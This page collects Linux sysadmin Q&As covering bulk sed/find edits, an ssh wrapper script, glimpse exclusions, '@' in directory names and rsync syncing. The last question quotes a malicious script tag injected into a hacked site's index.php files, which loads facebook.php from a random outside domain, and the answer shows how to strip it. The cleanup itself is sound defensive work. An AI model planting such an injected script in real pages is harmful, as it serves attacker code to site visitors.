Linux tool to bulk change a website from http:// to https://

I need to change an entire PHP-based website from http:// to https://. The SSL certificate has already been installed and shows validity.
Now, the website has many subdirectories, shops, newsletters etc., but everything stems from one top-level directory.
Is there a tool or method under Linux that lets me do this recursively, i.e. covering all the various sub-directories in my search, and automatically exchange http:// for https://? Is there a way not only to do the exchange but also to save the changed files automatically?
Maybe a stupid question, but I'd appreciate your help a lot so as to prevent myself from going through every single PHP file in every single directory.

The sed command has an in-place option which can be helpful in executing your change. For example
sed -i 's/original/new/g' file.txt
In your case this may work for the .php files in the current directory
sed -i 's/http:\/\//https:\/\//g' ./*.php
I would recommend a backup before you try this, since the -i option behaves differently on some systems (BSD/macOS sed, for example, requires a backup-suffix argument after -i).
Here is a reference with more information.
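If you also need to cover all the subdirectories, a find-based variant along these lines might work (a sketch; /var/www/site stands in for your top-level directory, and the .bak suffix keeps a backup copy of every changed file):
# recurse from the top-level directory and edit every .php file in place
find /var/www/site -type f -name '*.php' -exec sed -i.bak 's|http://|https://|g' {} +
Using | as the sed delimiter avoids having to escape every slash in the URLs.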

Related

ssh logon with variables

For work, I often have to log on to several different servers which are generally structured in the following:
ssh [username]@[clientName]-[product].[domainName]
The username and domain name are always the same, but the client and the product vary. On my previous computer, I was given a script which allowed me to log on to these servers by typing [product] [clientName], but I lost it when I switched PCs and now I don't know how to do that again.
Though I no doubt have been using the wrong search terms or something, I can't seem to find an answer to this question. All my searches lead me to aliases, which work but only for specific commands, not a general one where I can change the variable. I have over 100 clients and many have multiple different products, so an alias for each is impractical.
Could anyone explain how I implement this?
Bonus: It would also be useful for the command to also take me to a specific sub-directory on the server.
In the script, $0 is the name of the script, and $1 is the first argument. So the script should do:
ssh username@"$1"-"$0".domainName
Create the script once with a generic name, then use symbolic links to that for all the product names.
Put the script and all the links in a directory, and add that directory to your $PATH.
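A minimal sketch of such a script (the username, domainName, and the remote sub-directory are placeholders you would adapt):
#!/bin/sh
# Invoked as: <product> <clientName>, where <product> is the symlink name
product=$(basename "$0")   # the name this script was invoked as (the symlink name)
client=$1                  # first argument: the client name
# -t forces a terminal so the remote cd lands you in an interactive shell there
exec ssh -t "username@${client}-${product}.domainName" 'cd /some/subdirectory && exec "$SHELL" -l'
Save it e.g. as ~/bin/sshto, then ln -s ~/bin/sshto ~/bin/productA and log in with: productA clientX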

How to exclude directories in glimpse?

I'm using glimpse and I want to exclude searching through some files. I'm using a shared version of glimpse so I can't place a ".glimpse_exclude" file in that directory. I tried putting this file in my own local directory but that didn't work (maybe the answer to my question is more about where I can place this file so that glimpse will find it and use my local version?).
I see that there's a glimpse -W "a;~b" option which can exclude an expression (b, in this case), but I want to exclude a directory, something like:
glimpse -F "~exclude/this/directory/" mysearchwords
The best I have is to pipe this through grep and use grep's exclude functionality:
glimpse mysearchwords | grep -v "exclude/this/directory"
My main issue with this is that it loses glimpse's color coding so is a bit harder to look through the results.
In sum: what's the best way to exclude files for glimpse, without using the .glimpse_exclude file, and/or where can I place that file locally so it will be used when I run searches but will not affect the global glimpse command shared across my network?
In glimpse 3.5, as per http://ftp.icm.edu.pl/packages/glimpse/CHANGES:
3.0 --> 3.5
- added "-f filename" option to glimpse: it allows you to restrict the search to only those files whose names appear in "filename".
- fixed the agrep bug where -n was not working with ISO characters.
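If your glimpse has that option, one way to use it would be to build the file list with find and hand it to glimpse (a sketch; the paths are examples, and it assumes -f takes a plain list of file names as the changelog describes):
# list all files except those under the directory to exclude
find . -type f ! -path './exclude/this/directory/*' > /tmp/searchlist
# restrict the glimpse search to the files named in that list
glimpse -f /tmp/searchlist mysearchwords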

Could I have any issue using the @ (at sign) in a *n*x directory?

I'm developing a website, and want to create a directory named after the user's username, which is going to be their email address (so I don't have to generate new IDs, etc.).
I've made some tests and it seems to work fine. Also, I didn't find any documentation against using the "@" in a directory name, but could I run into some problem in the future with this approach?
I mean, might some browser not be able to upload images from this directory, or some other problem?
If you plan to run perl scripts (and possibly other languages) against those files you will need to remember to escape the @ sign (in Perl, an unescaped @ inside a double-quoted string is treated as an array interpolation). It's not a huge problem, but I personally would not do it.
More importantly if the path is visible to the browser you would be disclosing the user's email address to the whole world.
I would suggest using something like an MD5 hash of the user's email instead. It is (relatively) unique, and you can recalculate it very easily if you need to. Gravatar uses this approach for instance. See: http://en.gravatar.com/site/implement/hash/
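For instance, on a typical Linux system the hash can be computed like this (a sketch; the address is an example, and the lower-casing follows Gravatar's convention):
# normalise the address, then take the MD5 hex digest
printf '%s' 'user@example.com' | tr '[:upper:]' '[:lower:]' | md5sum | cut -d' ' -f1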
No, there should be no problems. Browsers just read the file; they don't care that much about the name, only the file content (and the response headers).
So there should be no problem.
Historically some remote filesystems have used the @ to "escape" from normal path processing to do "interesting" stuff.
Some version control systems use @ to denote a certain version of a path (e.g. Subversion, ClearCase).
Some other tools use @ to denote "user@remote_host" stuff - AFAIK rsync is one of them which might bite you - you should check whether that tool is used somewhere on your site for backup or syncing or something like that.
So - I would not use that character within filenames.

Copying just files not present with SCP

I need to move my web server directory to another server. I'd like to do it with a simple "scp -r destination:destdirectory". But in the meantime the directory keeps being filled with other stuff, so I'll have to take the old server down for however long it takes to move the newest files over to the new one. How can I do an scp that writes just the differences? That way it won't take much time, and I won't have to take the website down for too long!
Probably not at all, or only with pain. But if you have the possibility to use rsync, just do that. It automatically skips files that haven't changed, and for changed files it transfers only the differences.
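A typical invocation would look something like this (a sketch; the local path, user, and host are placeholders):
# -a archive mode (recursive, preserves permissions and timestamps), -v verbose, -z compress in transit
rsync -avz /var/www/ user@newserver:/var/www/
Run it once while the old server is still live, then take the site down and run the same command again; the second pass only transfers what changed in between.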

Linux command line : edit hacked index files [duplicate]

This question already has an answer here: Hacked Site - SSH to remove a large body of javascript from 200+ files [closed]
I'm unfortunately once more dealing with a hacked site on a Linux Plesk server. The issue itself is fixed and the FTP access has been changed (it came down to the well-known FileZilla stored-FTP-credentials hack on a PC), but I'd like to know how to edit the files directly, since restoring the site from our most recent backup may take over an hour and I'd be glad to have it back online faster.
The hack is rather simple: a piece of JavaScript was inserted into many index* files (only index.php, it seems) across the site.
I'm looking for a way to mass-edit the hacked files, knowing that even though the injected JavaScript is the same, it is loaded from a number of (probably also hacked) sites. So while my legitimate index file used to start with
<?php
it now starts like
<script type="text/javascript" src="http://(RANDOMDOMAINHERE)/facebook.php"></script><?php
As that string contains a varying part, could you help me find a sure-fire method to edit all the changed index files (about 80 found)?
I have used a sed replace before, but this time part of the string to replace varies, so can I use a wildcard?
Best regards, thanks for shedding light!
find . -name 'index.php' -print0 |
xargs -0 sed -i '1s#^<script type="text/javascript" src="http://[^"]*/facebook.php"></script>##'
Should do wonders
the sed command:
1 (apply the substitution only to the first line)
s#pattern#replacement# (replace pattern by replacement; note that the latter is empty, so the match is simply deleted)
^ (the pattern must match at the start of the line)
[^"]* (matches any run of characters that are not a double quote, so it covers the varying domain name without running past the closing quote of the src attribute)
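As a quick sanity check before editing in place, you could first count how many files actually contain the injected tag (a sketch using the same file selection):
find . -name 'index.php' -print0 | xargs -0 grep -l 'facebook.php"></script>' | wc -l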
Cheers
I sincerely hope you're not actually adminning a production domain. You should inform your users, get the problem fixed, and offer the users the option to go back to a recent backup that hasn't got the problem.
There is no telling what else has been tampered with.
I'm glad my VPS is somewhere else!
I would fix the cross-site scripting exploit before this problem is addressed or it will all be in vain. When that's done, a simple search and replace of the blocks of script that contain a common string should be sufficient.
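One way to drive that search and replace (a sketch; it relies on GNU grep's -Z/--null option and reuses the substitution shown above) is to let grep list every file that still contains the common string and hand the list to sed:
# -r recurse, -l list matching file names, -Z separate them with NUL bytes for xargs -0
grep -rlZ 'facebook.php"></script>' . | xargs -0 sed -i '1s#^<script type="text/javascript" src="http://[^"]*/facebook.php"></script>##'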
